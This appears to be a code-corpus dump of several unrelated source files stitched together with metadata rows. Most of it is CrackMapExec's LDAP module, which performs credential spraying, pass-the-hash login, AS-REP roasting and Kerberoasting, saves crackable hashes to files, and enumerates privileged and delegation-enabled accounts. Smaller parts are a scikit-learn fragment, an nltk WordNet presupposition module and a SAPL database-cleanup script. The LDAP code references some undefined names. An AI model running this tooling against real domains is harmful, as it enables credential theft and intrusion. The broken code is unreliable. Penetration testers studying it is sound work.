min_impurity_split=min_impurity_split,
random_state=random_state,
increasing=increasing,
decreasing=decreasing)
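# Minimal usage sketch (X_train/y_train/X_test are hypothetical arrays; as the
# docstrings above note, the extra-tree classes are normally used through the
# ensemble wrappers such as ExtraTreesClassifier / ExtraTreesRegressor):
#   clf = ExtraTreeClassifier(random_state=0).fit(X_train, y_train)
#   reg = ExtraTreeRegressor(random_state=0).fit(X_train, y_train)
#   predictions = reg.predict(X_test)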
| bsd-3-clause | -5,421,390,063,791,651,000 | 38.879388 | 143 | 0.572722 | false | 4.31622 | false | false | false |
byt3bl33d3r/CrackMapExec | cme/protocols/ldap.py | 1 | 35043 | # from https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py
# https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
import requests
import logging
import configparser
from cme.connection import *
from cme.helpers.logger import highlight
from cme.logger import CMEAdapter
from cme.protocols.ldap.kerberos import KerberosAttacks
from impacket.smbconnection import SMBConnection, SessionError
from impacket.smb import SMB_DIALECT
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH, UF_TRUSTED_FOR_DELEGATION, UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
from impacket.krb5.kerberosv5 import sendReceive, KerberosError, getKerberosTGT, getKerberosTGS
from impacket.krb5.types import KerberosTime, Principal
from impacket.ldap import ldap as ldap_impacket
from impacket.krb5 import constants
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from io import StringIO
class ldap(connection):
def __init__(self, args, db, host):
self.domain = None
self.server_os = None
self.os_arch = 0
self.hash = None
self.ldapConnection = None
self.lmhash = ''
self.nthash = ''
self.baseDN = ''
self.remote_ops = None
self.bootkey = None
self.output_filename = None
self.smbv1 = None
self.signing = False
self.smb_share_name = smb_share_name
self.admin_privs = False
connection.__init__(self, args, db, host)
@staticmethod
def proto_args(parser, std_parser, module_parser):
ldap_parser = parser.add_parser('ldap', help="own stuff using ldap", parents=[std_parser, module_parser])
ldap_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
ldap_parser.add_argument("--no-bruteforce", action='store_true', help='No spray when using file for username and password (user1 => password1, user2 => password2')
ldap_parser.add_argument("--continue-on-success", action='store_true', help="continues authentication attempts even after successes")
ldap_parser.add_argument("--port", type=int, choices={389, 636}, default=389, help="LDAP port (default: 389)")
dgroup = ldap_parser.add_mutually_exclusive_group()
dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', type=str, default=None, help="domain to authenticate to")
dgroup.add_argument("--local-auth", action='store_true', help='authenticate locally to each target')
        egroup = ldap_parser.add_argument_group("Retrieve hashes from the remote DC", "Options to get hashes from Kerberos")
egroup.add_argument("--asreproast", help="Get AS_REP response ready to crack with hashcat")
egroup.add_argument("--kerberoasting", help='Get TGS ticket ready to crack with hashcat')
        vgroup = ldap_parser.add_argument_group("Retrieve useful information on the domain", "Options to play with Kerberos")
vgroup.add_argument("--trusted-for-delegation", action="store_true", help="Get the list of users and computers with flag TRUSTED_FOR_DELEGATION")
vgroup.add_argument("--password-not-required", action="store_true", help="Get the list of users with flag PASSWD_NOTREQD")
vgroup.add_argument("--admin-count", action="store_true", help="Get objets that had the value adminCount=1")
vgroup.add_argument("--users", action="store_true", help="Enumerate domain users")
vgroup.add_argument("--groups", action="store_true", help="Enumerate domain groups")
return parser
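    # Illustrative invocations (a sketch only; the global -u/-p and --kdcHost flags come
    # from CME's shared argument parser, so exact spellings may differ between releases):
    #   cme ldap 10.0.0.10 -u users.txt -p '' --asreproast asrep.hashes
    #   cme ldap 10.0.0.10 -u admin -p 'Passw0rd!' --kerberoasting kerb.hashes
    #   cme ldap 10.0.0.10 -u admin -p 'Passw0rd!' --trusted-for-delegation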
def proto_logger(self):
self.logger = CMEAdapter(extra={
'protocol': 'LDAP',
'host': self.host,
'port': self.args.port,
'hostname': self.hostname
})
def get_os_arch(self):
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
if self.args.kerberos:
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
            except DCERPCException as e:
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except Exception as e:
logging.debug('Error retrieving os arch of {}: {}'.format(self.host, str(e)))
return 0
def enum_host_info(self):
self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]
try:
self.conn.login('' , '')
except:
#if "STATUS_ACCESS_DENIED" in e:
pass
self.domain = self.conn.getServerDNSDomainName()
self.hostname = self.conn.getServerName()
self.server_os = self.conn.getServerOS()
self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection['RequireSigning']
self.os_arch = self.get_os_arch()
self.output_filename = os.path.expanduser('~/.cme/logs/{}_{}_{}'.format(self.hostname, self.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
if not self.domain:
self.domain = self.hostname
try:
'''plaintext_login
DC's seem to want us to logoff first, windows workstations sometimes reset the connection
(go home Windows, you're drunk)
'''
self.conn.logoff()
except:
pass
if self.args.domain:
self.domain = self.args.domain
if self.args.local_auth:
self.domain = self.hostname
#Re-connect since we logged off
self.create_conn_obj()
def print_host_info(self):
self.logger.info(u"{}{} (name:{}) (domain:{}) (signing:{}) (SMBv1:{})".format(self.server_os,
' x{}'.format(self.os_arch) if self.os_arch else '',
self.hostname,
self.domain,
self.signing,
self.smbv1))
def kerberos_login(self, aesKey, kdcHost):
# Create the baseDN
domainParts = self.domain.split('.')
self.baseDN = ''
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.kdcHost is not None:
target = self.kdcHost
else:
target = self.domain
try:
self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,
self.aesKey, kdcHost=self.kdcHost)
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,
self.aesKey, kdcHost=self.kdcHost)
return True
def plaintext_login(self, domain, username, password):
self.username = username
self.password = password
self.domain = domain
# Create the baseDN
self.baseDN = ''
domainParts = self.domain.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.kdcHost is not None:
target = self.kdcHost
else:
target = domain
if self.password == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return False
        # Build the success message up front so it is also available to the LDAPS retry below
        out = u'{}{}:{} {}'.format('{}\\'.format(domain),
                                        username,
                                        password,
                                        highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
        try:
            # Connect to LDAP
            self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
            self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
            #self.check_if_admin()
            self.logger.success(out)
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.logger.success(out)
except ldap_impacket.LDAPSessionError as e:
self.logger.error(u'{}\{}:{}'.format(self.domain,
self.username,
self.password))
else:
self.logger.error(u'{}\{}:{}'.format(self.domain,
self.username,
self.password))
return False
except OSError as e:
self.logger.error(u'{}\{}:{} {}'.format(self.domain,
self.username,
self.password,
"Error connecting to the domain, please add option --kdcHost with the IP of the domain controller"))
return False
def hash_login(self, domain, username, ntlm_hash):
lmhash = ''
nthash = ''
#This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(':') != -1:
lmhash, nthash = ntlm_hash.split(':')
else:
nthash = ntlm_hash
self.hash = ntlm_hash
if lmhash: self.lmhash = lmhash
if nthash: self.nthash = nthash
self.username = username
self.domain = domain
# Create the baseDN
self.baseDN = ''
domainParts = self.domain.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.kdcHost is not None:
target = self.kdcHost
else:
target = domain
if self.hash == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return False
# Connect to LDAP
out = u'{}{}:{}'.format('{}\\'.format(domain),
username,
nthash)
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
#self.check_if_admin()
self.logger.success(out)
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
try:
# We need to try SSL
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.logger.success(out)
except ldap_impacket.LDAPSessionError as e:
self.logger.error(u'{}\{}:{}'.format(self.domain,
self.username,
self.nthash))
else:
self.logger.error(u'{}\{}:{}'.format(self.domain,
self.username,
self.nthash))
return False
except OSError as e:
self.logger.error(u'{}\{}:{} {}'.format(self.domain,
self.username,
self.nthash,
"Error connecting to the domain, please add option --kdcHost with the IP of the domain controller"))
return False
def create_smbv1_conn(self):
try:
self.conn = SMBConnection(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT)
self.smbv1 = True
except socket.error as e:
if str(e).find('Connection reset by peer') != -1:
logging.debug('SMBv1 might be disabled on {}'.format(self.host))
return False
except Exception as e:
logging.debug('Error creating SMBv1 connection to {}: {}'.format(self.host, e))
return False
return True
def create_smbv3_conn(self):
try:
self.conn = SMBConnection(self.host, self.host, None, 445)
self.smbv1 = False
except socket.error:
return False
except Exception as e:
logging.debug('Error creating SMBv3 connection to {}: {}'.format(self.host, e))
return False
return True
def create_conn_obj(self):
if self.create_smbv1_conn():
return True
elif self.create_smbv3_conn():
return True
return False
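    # getUnixTime converts a Windows FILETIME value (100-nanosecond intervals since
    # 1601-01-01) into a Unix timestamp: 116444736000000000 is the FILETIME of the
    # Unix epoch, and dividing by 10**7 turns the remainder into seconds.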
def getUnixTime(self, t):
t -= 116444736000000000
t /= 10000000
return t
def search(self, searchFilter, attributes, sizeLimit=999):
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = self.ldapConnection.search(searchFilter=searchFilter,
attributes=attributes,
sizeLimit=sizeLimit)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
logging.debug(e)
return False
return resp
def users(self):
# Building the search filter
searchFilter = "(sAMAccountType=805306368)"
attributes= []
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
badPasswordTime = ''
badPwdCount = 0
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'badPwdCount':
badPwdCount = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'badPasswordTime':
if str(attribute['vals'][0]) == '0':
badPasswordTime = '<never>'
else:
badPasswordTime = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName, badPwdCount, badPasswordTime])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight('{:<30} badpwdcount: {} pwdLastSet: {}'.format(value[0], int(value[1],16),value[2]))
else:
self.logger.error("No entries found!")
return
def groups(self):
# Building the search filter
searchFilter = "(objectCategory=group)"
attributes=[]
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
name = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'name':
name = str(attribute['vals'][0])
mustCommit = True
# if str(attribute['type']) == 'objectSid':
# print(format_sid((attribute['vals'][0])))
if mustCommit is True:
answers.append([name])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight('{}'.format(value[0]))
else:
self.logger.error("No entries found!")
return
def asreproast(self):
if self.password == '' and self.nthash == '' and self.kerberos == False:
return False
# Building the search filter
searchFilter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" % \
(UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)
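        # 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule: keep accounts
        # with DONT_REQUIRE_PREAUTH (0x400000) set, drop disabled accounts (0x2) and
        # computer objects.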
attributes = ['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
for user in answers:
hash_TGT = KerberosAttacks(self).getTGT_asroast(user[0])
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return True
else:
self.logger.error("No entries found!")
def kerberoasting(self):
# Building the search filter
searchFilter = "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))"
attributes = ['servicePrincipalName', 'sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
SPNs = []
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
delegation = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = str(attribute['vals'][0])
if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:
delegation = 'unconstrained'
elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:
delegation = 'constrained'
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'servicePrincipalName':
for spn in attribute['vals']:
SPNs.append(str(spn))
if mustCommit is True:
if int(userAccountControl) & UF_ACCOUNTDISABLE:
logging.debug('Bypassing disabled account %s ' % sAMAccountName)
else:
for spn in SPNs:
answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon, delegation])
except Exception as e:
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
#users = dict( (vals[1], vals[0]) for vals in answers)
TGT = KerberosAttacks(self).getTGT_kerberoasting()
for SPN, sAMAccountName, memberOf, pwdLastSet, lastLogon, delegation in answers:
try:
serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.domain,
self.kdcHost,
TGT['KDC_REP'], TGT['cipher'],
TGT['sessionKey'])
r = KerberosAttacks(self).outputTGS(tgs, oldSessionKey, sessionKey, sAMAccountName, SPN)
self.logger.highlight(u'sAMAccountName: {} memberOf: {} pwdLastSet: {} lastLogon:{}'.format(sAMAccountName, memberOf, pwdLastSet, lastLogon))
self.logger.highlight(u'{}'.format(r))
with open(self.args.kerberoasting, 'a+') as hash_kerberoasting:
hash_kerberoasting.write(r + '\n')
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error('SPN: %s - %s' % (SPN,str(e)))
else:
self.logger.error("No entries found!")
def trusted_for_delegation(self):
# Building the search filter
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
attributes = ['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight(value[0])
else:
self.logger.error("No entries found!")
return
def password_not_required(self):
# Building the search filter
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=32)"
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = self.ldapConnection.search(searchFilter=searchFilter,
attributes=['sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=999)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
return False
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
status = 'enabled'
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
if int(attribute['vals'][0]) & 2 :
status = 'disabled'
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName, memberOf, pwdLastSet, lastLogon, userAccountControl, status])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight("User: " + value[0] + " Status: " + value[5])
else:
self.logger.error("No entries found!")
return
def admin_count(self):
# Building the search filter
searchFilter = "(adminCount=1)"
attributes=['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight(value[0])
else:
self.logger.error("No entries found!")
return
| bsd-2-clause | -7,680,955,245,509,472,000 | 46.227763 | 171 | 0.515652 | false | 4.383114 | false | false | false |
napsternxg/nltk-drt | nltk-drt/src/wntemporaldrt.py | 1 | 5538 | """
Extension of temporaldrt using WordNet ontology
"""
__author__ = " Emma Li, Peter Makarov, Alex Kislev"
__version__ = "1.0"
__date__ = "Tue, 24 Aug 2010"
import nltk
from nltk.corpus.reader.wordnet import WordNetCorpusReader
import temporaldrt as drt
from temporaldrt import DrtTokens, DrtFeatureConstantExpression
def singleton(cls):
instance_container = []
def getinstance():
if not len(instance_container):
instance_container.append(cls())
return instance_container[0]
return getinstance
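# Usage sketch for the decorator (Foo is hypothetical): decorating a class replaces it
# with a factory that always returns the same instance, so
#   @singleton
#   class Foo(object): pass
#   Foo() is Foo()   # -> True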
@singleton
class WordNetLookup(object):
def __init__(self, path='corpora/wordnet'):
self.path = path
self.WN = None
def wn(self):
if not self.WN:
self.WN = WordNetCorpusReader(nltk.data.find(self.path))
def is_superclass_of(self, first, second):
"Is the second noun the superclass of the first one?"
self.wn()
try:
num_of_senses_first = self._num_of_senses(first)
num_of_senses_second = self._num_of_senses(second)
except: return False
for n in range(num_of_senses_second):
synset_second = self._noun_synset(second, ind=n)
for i in range(num_of_senses_first):
if synset_second in self._noun_synset(first, i).common_hypernyms(synset_second):
return True
return False
def is_adjective(self, word):
try:
self._num_of_senses(word, 'a')
return True
except: return False
def _noun_synset(self, noun, ind):
self.wn()
return self.WN.synset("%s.n.%s" % (noun, ind))
def _num_of_senses (self, word, pos='n'):
self.wn()
return len(self.WN._lemma_pos_offset_map[word][pos])
def is_person(self, word):
return self.is_superclass_of(word, 'person')
def is_animal(self, word):
return self.is_superclass_of(word, 'animal')
class DefiniteDescriptionDRS(drt.DefiniteDescriptionDRS):
def __init__(self, refs, conds):
self.wn = WordNetLookup()
super(drt.DefiniteDescriptionDRS, self).__init__(refs, conds)
def _strict_check (self, presupp_noun, other_cond):
other_noun = other_cond.function.variable.name
return (
presupp_noun == other_noun or
self.wn.is_superclass_of(other_noun, presupp_noun) or
(other_cond.is_propername() and (self.wn.is_person(presupp_noun) or self.wn.is_animal(presupp_noun)))
)
def _non_strict_check(self, presupp_noun, other_cond):
strict_check = self._strict_check(presupp_noun, other_cond)
if strict_check: return True
# If the strict check fails, check if both are people
other_noun = other_cond.function.variable.name
return (
(self.wn.is_person(presupp_noun) and self.wn.is_person(other_noun))
or self.wn.is_superclass_of(presupp_noun, other_noun)) # cat, kitty
def semantic_check(self, individuals, presupp_individuals, strict=False):
check = {True : self._strict_check,
False: self._non_strict_check}[strict]
# Strict check - passes if features match and 1) string matching 2) hyponym-hypernym relation, and
# 3) self.funcname is a person or animal and the antecedent is a proper name
# Non-strict check: both are people and features match
if isinstance(self.cond, DrtFeatureConstantExpression):
for individual in individuals:
if isinstance(individual, DrtFeatureConstantExpression) and check(self.function_name, individual):
return True
return False
else:
# If no features are used, we cannot guarantee that the condition we got self.function_name from wasn't an adjective.
# Likewise, individuals contains not only nouns but also adjectives, and we don't know which are which
found_noun = False # We should find at least one noun
for presupp_individual in presupp_individuals[self.variable]:
presupp_noun = presupp_individual.function.variable.name
if not self.wn.is_adjective(presupp_noun):
found_noun = True
break
# If we found no noun (that is not also an adjective), ignore the 'is adjective' check for presupposition individuals
# (in that case, we had probably better ignore this check for 'individuals', too)
for individual in individuals:
other_noun = individual.function.variable.name
if found_noun and self.wn.is_adjective(other_noun): continue
for presupp_individual in presupp_individuals[self.variable]:
presupp_noun = presupp_individual.function.variable.name
if found_noun and self.wn.is_adjective(presupp_noun): continue
if check (presupp_noun, individual):
return True
return False
class DrtParser(drt.DrtParser):
def handle_PresuppositionDRS(self, tok, context):
if tok == DrtTokens.DEFINITE_DESCRIPTION_DRS:
self.assertNextToken(DrtTokens.OPEN)
drs = self.handle_DRS(tok, context)
return DefiniteDescriptionDRS(drs.refs, drs.conds)
else:
return drt.DrtParser.handle_PresuppositionDRS(self, tok, context) | apache-2.0 | -8,525,457,456,032,012,000 | 41.937984 | 129 | 0.615565 | false | 3.699399 | false | false | false |
vitalti/sapl | sapl/legacy/scripts/street_sweeper.py | 1 | 5080 | #!/usr/bin/python
# requirement: pip install PyMySQL
import pymysql.cursors
HOST = 'localhost'
USER = 'root'
PASSWORD = ''
DB = ''
SELECT_EXCLUIDOS = "SELECT %s FROM %s WHERE ind_excluido = 1 ORDER BY %s"
REGISTROS_INCONSISTENTES = "DELETE FROM %s WHERE %s " \
    "in (%s) AND ind_excluido = 0 "
EXCLUI_REGISTRO = "DELETE FROM %s WHERE ind_excluido=1"
NORMA_DEP = "DELETE FROM vinculo_norma_juridica WHERE cod_norma_referente in (%s) OR \
cod_norma_referida in (%s) AND ind_excluido = 0 "
mapa = {}  # map of main table -> dependent tables
mapa['tipo_autor'] = ['autor']
mapa['materia_legislativa'] = ['acomp_materia', 'autoria', 'despacho_inicial',
'documento_acessorio', 'expediente_materia',
'legislacao_citada', 'materia_assunto',
'numeracao', 'ordem_dia', 'parecer',
'proposicao', 'registro_votacao',
'relatoria', 'tramitacao']
mapa['norma_juridica'] = ['vinculo_norma_juridica']
mapa['comissao'] = ['composicao_comissao']
mapa['sessao_legislativa'] = ['composicao_mesa']
mapa['tipo_expediente'] = ['expediente_sessao_plenaria']
"""
mapa['autor'] = ['tipo_autor', 'partido', 'comissao', 'parlamentar']
mapa['parlamentar'] = ['autor', 'autoria', 'composicao_comissao',
'composicao_mesa', 'dependente', 'filiacao',
'mandato', 'mesa_sessao_plenaria', 'oradores',
'oradores_expediente', 'ordem_dia_presenca',
'registro_votacao_parlamentar', 'relatoria',
'sessao_plenaria_presenca', 'unidade_tramitacao']
"""
def get_ids_excluidos(cursor, query):
"""
    retrieves the PKs of records with ind_excluido = 1 from the main table
"""
cursor.execute(query)
excluidos = cursor.fetchall()
# flat tuple of tuples with map transformation into string
